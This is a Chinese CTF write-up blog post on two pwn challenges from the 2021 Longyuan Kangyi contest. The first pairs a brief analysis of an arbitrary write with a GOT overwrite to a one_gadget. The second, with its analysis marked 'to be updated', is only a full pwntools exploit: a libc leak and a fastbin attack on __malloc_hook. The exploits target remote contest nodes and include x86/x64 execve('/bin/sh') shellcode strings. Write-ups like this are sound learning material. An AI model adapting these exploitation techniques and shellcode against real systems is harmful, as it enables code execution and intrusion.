ReStr0
Venom战队队员 Chamd5安全团队
ReStr0-Blog

陇原抗疫2021 pwn1

PWN1-bbbaby

这个题目就是一个one_gadget+覆写got表的题,,

因为我做题用了本地环境的libc,没有打通,,我还以为是自己脚本的问题,赛后发现题目给的libc是小版本的libc和我ubuntu16自带的libc版本不一,

分析题目

https://blog.restro.cn/wp-content/uploads/2021/11/image.png

主函数返现当我们输入1会进入输入data的地方,输入0会进入some_read()(这里存在一个修改地址的操作)

https://blog.restro.cn/wp-content/uploads/2021/11/image-1.png

在这里我们发现我们竟然可以修改指定的地址

查看保护机制发现没有开启pie。

于是有了思路,通过改写got表后四位进行爆破,让返回地址到one_gadget地址就可以成功getshell,因为got表的地址是会变化的,所以这里选择one_gadget的时候需要选择0xf开头的onegadget进行使用。

EXP

# _*_ coding:utf-8 _*_
from pwn import *
context.log_level = 'debug'

#p=process("pwn1")
p=remote("node4.buuoj.cn","26388")

sa      = lambda delim,data         :p.sendafter(str(delim), str(data)) 
sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data)) 
it      = lambda                    :p.interactive()


def choice(idx):
    sla("your choice",str(idx))

def exp():
    choice(0)
    sla("address:",(6295592))
    sa("content:",p16(0x62a4))
    it()
if __name__ == '__main__':
    exp()

PWN2–magic

待更新

EXP

# _*_ coding:utf-8 _*_
from pwn import *
context.log_level = 'debug'
context.terminal=['tmux', 'splitw', '-h']
prog = './Magic'
#elf = ELF(prog)#nc 121.36.194.21 49155
# p = process(prog,env={"LD_PRELOAD":"./libc/libc-2.23.so"})
libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
p = remote("node4.buuoj.cn", 25680)#nc 124.71.130.185 49155
def debug(addr,PIE=True): 
    debug_str = ""
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16) 
        for i in addr:
            debug_str+='b *{}\n'.format(hex(text_base+i))
        gdb.attach(p,debug_str) 
    else:
        for i in addr:
            debug_str+='b *{}\n'.format(hex(i))
        gdb.attach(p,debug_str) 

def dbg():
    gdb.attach(p)
#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))        #in case that data is an int
sa      = lambda delim,data         :p.sendafter(str(delim), str(data)) 
sl      = lambda data               :p.sendline(str(data)) 
sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data)) 
r       = lambda numb=4096          :p.recv(numb)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
it      = lambda                    :p.interactive()
uu32    = lambda data   :u32(data.ljust(4, '\0'))
uu64    = lambda data   :u64(data.ljust(8, '\0'))
bp      = lambda bkp                :pdbg.bp(bkp)
li      = lambda str1,data1         :log.success(str1+'========>'+hex(data1))

    
def dbgc(addr):
    gdb.attach(p,"b*" + hex(addr) +"\n c")

def lg(s,addr):
    print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------

def choice(idx):
    sla("Input your choice: ",str(idx)+'\n\n')
    # sla("Input your choice: ",str(idx))

def add(idx):
    choice(1)
    sa("Input the idx",str(idx)+'\x00\x00\x00')
    # sl('\n\n')
    # sla("Size: ",sz)
    # sa("content?",cno)

def delete(idx):
    
    choice(3)
    sa("Input the idx",str(idx)+'\x00\x00\x00')
    # sl('\n\n')

# def show(idx):
#   choice(3)
#   sla("Index: ",idx)

def edit(idx,con):
    choice(2)
    sa("Input the idx",str(idx)+'\x00\x00\x00')
    # sl('\n')
    # sla("size?",sz)
    sa("Input the Magic",con)



def exp():
    # debug([0x13aa])
    add(0)
    edit(0,'a'*8)
    # delete(0)
    ru('a'*8)
    data = uu64(r(6))
    lg('data',data)
    addr = data - 0x7fe66967cd98 + 0x7fe6692b8000
    mh = addr + libc.sym['__malloc_hook']
    rh = addr + libc.sym['realloc']
    lg('addr',addr)
    one = addr + 0x4527a
#-----------------------------
    delete(0)
    edit(0,p64(mh-0x23))
    add(0)
    add(1)
    lg('rh',rh)
    edit(1,(0x13-8)*'a'+p64(one)+p64(rh+13))
    # dbg()

    add(0)

    

    it()
if __name__ == '__main__':
    exp()

发表评论

textsms
account_circle
email

ReStr0-Blog

陇原抗疫2021 pwn1
PWN1-bbbaby 这个题目就是一个one_gadget+覆写got表的题,, 因为我做题用了本地环境的libc,没有打通,,我还以为是自己脚本的问题,赛后发现题目给的libc是小版本的libc和我ubunt…
扫描二维码继续阅读
2021-11-08